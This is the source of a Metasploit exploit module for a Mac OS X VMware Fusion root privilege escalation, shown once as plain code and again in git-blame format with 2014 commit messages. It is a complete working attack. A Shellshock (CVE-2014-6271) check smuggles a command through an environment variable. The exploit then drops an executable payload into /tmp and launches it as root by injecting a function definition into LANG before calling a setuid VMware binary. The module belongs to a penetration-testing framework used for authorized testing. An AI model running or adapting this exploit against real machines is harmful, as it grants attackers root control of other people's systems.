metasploit-framework/modules/exploits/osx/local/vmware_bash_function_root.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X VMWare Fusion Root Privilege Escalation Exploit',
      'Description'   => %q{
        This abuses the bug in bash environment variables (CVE-2014-6271) to get
        a suid binary inside of VMWare Fusion to launch our payload as root.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Stephane Chazelas', # discovered the bash bug
          'juken', # discovered the VMWare priv esc
          'joev' # msf module
        ],
      'References'    =>
        [
          [ 'CVE', '2014-6271' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9 Mavericks x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))

    register_options([
      OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),
    ], self.class)
  end

  def check
    check_str = Rex::Text.rand_text_alphanumeric(5)
    # ensure they are vulnerable to bash env variable bug
    if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&
       cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/

      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    process_check = datastore['VMWARE_PATH'] + '/Contents/Library/[VO]'
    processes = cmd_exec("bash -c \"ps ax | grep '#{process_check}'\"").split("\n")

    if processes.length > 0
      print_error "VMware is already running the following processes:\n " + processes.join("\n")
      print_error "These processes must be killed before exploiting."
      return
    end

    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    path = '/Contents/Library/Open VMware Fusion Services' # path to the suid binary

    print_status "Writing payload file as '#{payload_file}'"
    exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    write_file(payload_file, exe)
    register_file_for_cleanup(payload_file)
    cmd_exec("chmod +x #{payload_file}")

    print_status "Running VMWare services..."
    cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}'")
  end

end
Adds osx vmware/bash priv escalation. 2014-09-24 22:44:14 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rex'`

			`class Metasploit3 < Msf::Exploit::Local`
			`Rank = NormalRanking`

			`include Msf::Post::File`
			`include Msf::Exploit::EXE`
			`include Msf::Exploit::FileDropper`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Mac OS X VMWare Fusion Root Privilege Escalation Exploit',`
			`'Description' => %q{`
			`This abuses the bug in bash environment variables (CVE-2014-6271) to get`
			`a suid binary inside of VMWare Fusion to launch our payload as root.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Stephane Chazelas', # discovered the bash bug`
			`'juken', # discovered the VMWare priv esc`
			`'joev' # msf module`
			`],`
			`'References' =>`
			`[`
			`[ 'CVE', '2014-6271' ]`
			`],`
			`'Platform' => 'osx',`
			`'Arch' => [ ARCH_X86_64 ],`
			`'SessionTypes' => [ 'shell', 'meterpreter' ],`
			`'Targets' => [`
			`[ 'Mac OS X 10.9 Mavericks x64 (Native Payload)',`
			`{`
			`'Platform' => 'osx',`
			`'Arch' => ARCH_X86_64`
			`}`
			`]`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Sep 24 2014'`
			`))`

			`register_options([`
			`OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),`
			`], self.class)`
			`end`

			`def check`
			`check_str = Rex::Text.rand_text_alphanumeric(5)`
			`# ensure they are vulnerable to bash env variable bug`
			`if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&`
			`cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/`

			`Exploit::CheckCode::Vulnerable`
			`else`
			`Exploit::CheckCode::Safe`
			`end`
			`end`

			`def exploit`
Check for running vmware processes first. 2014-09-25 00:11:38 +00:00			`process_check = datastore['VMWARE_PATH'] + '/Contents/Library/[VO]'`
			`processes = cmd_exec("bash -c \"ps ax \| grep '#{process_check}'\"").split("\n")`

			`if processes.length > 0`
			`print_error "VMware is already running the following processes:\n " + processes.join("\n")`
			`print_error "These processes must be killed before exploiting."`
			`return`
			`end`

Adds osx vmware/bash priv escalation. 2014-09-24 22:44:14 +00:00			`payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"`
			`path = '/Contents/Library/Open VMware Fusion Services' # path to the suid binary`

			`print_status "Writing payload file as '#{payload_file}'"`
			`exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)`
			`write_file(payload_file, exe)`
			`register_file_for_cleanup(payload_file)`
			`cmd_exec("chmod +x #{payload_file}")`

			`print_status "Running VMWare services..."`
			`cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}'")`
			`end`

			`end`